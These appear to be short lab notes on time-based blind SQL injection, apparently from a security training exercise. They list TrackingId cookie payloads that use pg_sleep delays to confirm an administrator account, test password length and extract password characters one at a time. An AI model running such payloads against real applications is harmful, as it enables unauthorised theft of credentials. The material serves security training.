Lab Blind SQL injection with time d
Lab Blind SQL injection with time d
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
2/
Verify that the application responds immediately with no time delay. This
demonstrates how you can test a single boolean condition and infer the result.
TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
3/
Verify that the condition is true, confirming that there is a user called
administrator.
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')
+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
4/
This condition should be true, confirming that the password is greater than 1
character in length.
TrackingId=x'%3BSELECT+CASE+WHEN+
(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0
)+END+FROM+users--
5/
This uses the SUBSTRING() function to extract a single character from the password,
and test it against a specific value.
TrackingId=x'%3BSELECT+CASE+WHEN+
(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')
+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--